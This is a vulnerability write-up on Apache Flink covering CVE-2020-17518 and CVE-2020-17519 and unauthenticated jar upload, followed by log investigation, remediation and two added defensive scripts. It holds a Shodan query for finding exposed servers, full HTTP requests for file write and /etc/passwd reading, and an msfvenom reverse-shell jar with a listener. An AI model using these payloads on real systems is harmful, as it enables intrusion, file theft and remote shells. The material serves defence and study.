Apache Flink Vulnerability Overview
Apache Flink is an open-source stream processing framework with powerful stream and batch processing capabilities.
CVE-2020-17518: Apache Flink 1.5.1 introduced a REST handler that lets an uploaded file be written to an arbitrary location on the local file system by way of a maliciously crafted HTTP header (the filename in the multipart Content-Disposition).
CVE-2020-17519: A change introduced in Apache Flink 1.11.0 (also present in 1.11.1 and 1.11.2) lets an attacker read any file on the JobManager's local file system through the REST interface of the JobManager process.
Unauthorized jar upload for getshell: this one has no CVE. Uploading a jar and running it is an intended feature, but Flink's web UI has no authentication, so anyone who can reach it can upload a jar and obtain a shell.
Affected Versions of Apache Flink
CVE-2020-17518 1.5.1 < Flink < 1.11.2
CVE-2020-17519 Flink 1.11.0, 1.11.1, 1.11.2
Shodan Search Syntax: Apache Flink
http.favicon.hash:180732787

Apache Flink Vulnerability Exploit
Exploitation is straightforward; the public exploit scripts on GitHub did not work reliably in testing, so manual reproduction is recommended.
https://github.com/QmF0c3UK/CVE-2020-17518
https://github.com/B1anda0/CVE-2020-17519
Setting Up an Apache Flink Vulnerability Environment
Use vulhub to reproduce. Once the environment is up, the web management UI can be opened directly without authentication. Both CVEs use the same environment.
Without Docker, download the tgz from the official site, extract it and start the cluster. Note that 1.14.6 lies outside the affected version ranges listed above, so on that release only the unauthenticated jar upload applies.
https://flink.apache.org/downloads
wget https://archive.apache.org/dist/flink/flink-1.14.6/flink-1.14.6-bin-scala_2.11.tgz
tar xvf flink-1.14.6-bin-scala_2.11.tgz
cd flink-1.14.6/bin/
./start-cluster.sh


Vulnerability Reproduction
CVE-2020-17518
Click the jar upload button in the web UI, capture the request with Burp, and change the filename in the Content-Disposition header to a traversal path.
POST /jars/upload HTTP/1.1
Host: vul.zgao.top:8081
Content-Length: 228
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryphBB4uHGBVImrUXt
Connection: close

------WebKitFormBoundaryphBB4uHGBVImrUXt
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
Content-Type: application/octet-stream

success
------WebKitFormBoundaryphBB4uHGBVImrUXt--


The response reports a successful upload, and the file lands at /tmp/success on the JobManager host.
CVE-2020-17519
GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
Host: vul.zgao.top:8081
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close

Unauthorized Jar Upload for Getshell
Create a reverse shell jar package with msfvenom.
msfvenom -p java/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f jar > rce.jar

msfconsole
set payload java/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
show options
run

Investigation and Tracing
Log locations:
- /opt/flink/log
- flink/flink-1.14.6/log/
If Flink was installed from the official tgz, the log directory is the log/ folder inside the directory it was extracted to.
Arbitrary File Write Vulnerability Investigation
Investigation keyword: JarUploadHandler (search the JobManager log for it to find upload requests and the filenames they carried)

Directory Traversal Vulnerability Investigation
The directory traversal file read (CVE-2020-17519) leaves no entry in Flink's own logs, so evidence of it has to come from a reverse proxy access log or network capture in front of the REST port.
Check flink-conf.yaml for the configured upload directory and inspect the jar packages stored there.

Investigation keyword: JarRunHandler (search the log for it to find job submissions that ran an uploaded jar)

Output from executed commands (the JobManager process's stdout) is written to the .out file, for example flink-root-standalonesession-0-VM-4-7-centos.out
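The following triage script is an added example for the investigation steps above and for the two handlers named in the overview; it is not code from the original write-up or from Apache Flink. It assumes the JobManager log is plain text and that upload entries carry a filename="..." field; the sample log lines in it are constructed, and Flink's real log format differs. The decoder handles only the %2f, %2e and %25 sequences needed to expose the double-encoded "..%252f" traversal used against CVE-2020-17519, and the traversal check covers the "../" filenames used against CVE-2020-17518.

```shell
#!/bin/sh
# Added triage helper (not part of the original post or of Apache Flink).
# Assumptions: plain-text JobManager log, upload lines with a filename="..."
# field (the sample lines below are CONSTRUCTED), and only %2f, %2e and %25
# need decoding to expose the double-encoded "..%252f" traversal.

# Percent-decode a path until it stops changing, so a double-encoded
# "..%252f" collapses to "../" exactly as the vulnerable handler ended up
# using it. A single decoding pass would miss the double encoding.
decode_path() {
    prev=""
    cur="$1"
    while [ "$cur" != "$prev" ]; do
        prev="$cur"
        cur=$(printf '%s\n' "$cur" | sed 's/%2[fF]/\//g; s/%2[eE]/./g; s/%25/%/g')
    done
    printf '%s\n' "$cur"
}

# Exit 0 when the decoded path escapes its directory ("../" anywhere, or a
# bare ".." component at the end), otherwise exit 1.
is_traversal() {
    case "$(decode_path "$1")" in
        *../*|*/..|..) return 0 ;;
    esac
    return 1
}

# Print every log line mentioning the two REST handlers from the write-up:
# JarUploadHandler (jar uploads) and JarRunHandler (job submissions that run
# an uploaded jar). No match is not an error.
handler_events() {
    grep -E 'JarUploadHandler|JarRunHandler' "$1" || true
}

# Count upload events whose filename escapes the upload directory (the
# CVE-2020-17518 pattern). Filenames containing whitespace are not handled.
suspicious_uploads() {
    n=0
    names=$(grep 'JarUploadHandler' "$1" | grep -o 'filename="[^"]*"' | sed 's/^filename="//; s/"$//')
    for name in $names; do
        if is_traversal "$name"; then n=$((n + 1)); fi
    done
    echo "$n"
}

# CONSTRUCTED sample log for a stand-alone run (not real Flink output).
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
2021-11-02 10:01:12,100 INFO  JarUploadHandler - upload filename="wordcount.jar" from 10.0.0.5
2021-11-02 10:03:45,220 INFO  JarUploadHandler - upload filename="../../../../../../tmp/success" from 203.0.113.9
2021-11-02 10:04:02,003 INFO  JarRunHandler - run jar a1b2c3d4_rce.jar entry-class Main from 203.0.113.9
2021-11-02 10:04:02,010 INFO  Dispatcher - received job submission
EOF

handler_events "$SAMPLE_LOG"
echo "suspicious uploads: $(suspicious_uploads "$SAMPLE_LOG")"
echo "decoded: $(decode_path '..%252f..%252fetc%252fpasswd')"
```

Point it at the real log with handler_events /opt/flink/log/<jobmanager log> once you have confirmed what the upload entries look like in your version; the decode-until-stable step is the part worth keeping in any proxy or WAF rule, since a single round of URL decoding leaves "..%2f" looking harmless.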

Remediation
- Upgrade to the latest version
- Prohibit unauthorized access to the Flink web UI and REST API
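The configuration audit below is an added example for the remediation advice; it is not part of the original write-up or of Apache Flink. It reads the documented keys rest.bind-address, web.submit.enable and web.upload.dir from a flink-conf.yaml, and the weak and hardened config files it creates are constructed samples. Flink's REST endpoint has no built-in authentication, so "prohibit unauthorized access" in practice means binding it to loopback or a private address, fronting it with an authenticating reverse proxy or firewall rule, and disabling jar upload through the web UI where it is not needed.

```shell
#!/bin/sh
# Added configuration audit (not part of the original write-up or of Flink).
# Keys checked are Flink's documented rest.bind-address, web.submit.enable
# and web.upload.dir; the two config files below are CONSTRUCTED samples.

# Read the value of one "key: value" line from a flink-conf.yaml style file
# (empty output when the key is absent or commented out).
conf_value() {
    sed -n "s/^[[:space:]]*$2:[[:space:]]*//p" "$1" | head -n 1
}

# Print one WEAK line per risky setting; return 0 only when nothing was found.
audit_conf() {
    findings=0
    bind=$(conf_value "$1" 'rest.bind-address')
    case "$bind" in
        ""|0.0.0.0|::)
            echo "WEAK: rest.bind-address is '${bind:-unset}', REST API and web UI are not restricted to a trusted address"
            findings=$((findings + 1)) ;;
    esac
    if [ "$(conf_value "$1" 'web.submit.enable')" != "false" ]; then
        echo "WEAK: web.submit.enable is not false, jars can be uploaded and run from the web UI"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# Where uploaded jars land, for the investigation step that inspects them.
upload_dir() {
    dir=$(conf_value "$1" 'web.upload.dir')
    if [ -n "$dir" ]; then
        echo "$dir"
    else
        echo "web.upload.dir unset: Flink generates a directory under its temp dir"
    fi
}

# CONSTRUCTED weak and hardened configs, side by side.
WEAK_CONF=$(mktemp)
HARD_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARD_CONF"' EXIT
cat > "$WEAK_CONF" <<'EOF'
jobmanager.rpc.address: localhost
rest.port: 8081
rest.bind-address: 0.0.0.0
web.submit.enable: true
EOF
cat > "$HARD_CONF" <<'EOF'
jobmanager.rpc.address: localhost
rest.port: 8081
rest.bind-address: 127.0.0.1
web.submit.enable: false
web.upload.dir: /opt/flink/upload
EOF

echo "== weak =="
audit_conf "$WEAK_CONF" || echo "fix the settings above"
echo "== hardened =="
audit_conf "$HARD_CONF" && echo "no weak settings"
echo "upload dir: $(upload_dir "$HARD_CONF")"
```

Run audit_conf against the live conf/flink-conf.yaml; a non-zero exit means at least one of the two settings still leaves the UI exposed. Setting web.submit.enable to false closes the unauthenticated jar upload path but does nothing for the two CVEs, which still require the upgrade.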